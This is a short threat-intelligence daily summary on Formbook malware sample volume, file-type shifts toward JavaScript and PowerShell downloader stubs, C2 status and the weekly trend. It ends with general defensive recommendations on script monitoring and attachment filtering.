Daily Summary
Formbook sample volume dropped to 12 on 2026-05-04, a 62% decrease from the 7-day average of 32. This marks a continued decline in activity, with no notable spikes observed today.
New Samples Detected
All 12 new samples are installer or downloader stubs rather than core payloads. File distribution shows a strong pivot to script-based attack: 7 .js files and 3 .ps1 files dominate, while only 1 .exe and 1 .dll were observed. This packaging shift favors execution via Windows Script Host and PowerShell, likely to bypass application control policies.
Distribution Methods
The script-heavy mix suggests delivery through phishing attachments or email links, where .js and .ps1 files are often used to fetch and execute the main Formbook payload in memory. The low .exe count implies attackers are moving away from direct executable downloads, preferring fileless staging to evade static detection.
Detection Rate
Given the small sample set, detection rates remain moderate; however, the scripted stubs may evade traditional signature-based engines. Behavioral detection for scripting hosts is critical, as these initial stages often go unchecked by static analysis. Fresh variants using obfuscated PowerShell or JScript code may achieve lower initial detection.
C2 Infrastructure
No new C2 servers were registered today. Existing infrastructure appears stable, with no geographic shifts or new IPs observed. Analysts should continue monitoring for dormant or recycled domains from prior campaigns.
7-Day Trend
Activity is clearly cooling down, with today’s sample count representing the lowest point in the week. This decline may indicate a campaign pause or shift to other delivery methods.
Security Analysis
A notable observation is the complete absence of .doc or .xls file types in today’s haul, which were previously common for Formbook. This suggests attackers are abandoning macro-laden Office documents in favor of script-only attacks, possibly due to improved macro blocking by security products. Actionable recommendation: Deploy robust script execution monitoring via AMSI and block PowerShell execution from non-admin users. Restrict .js and .ps1 email attachments at the gateway.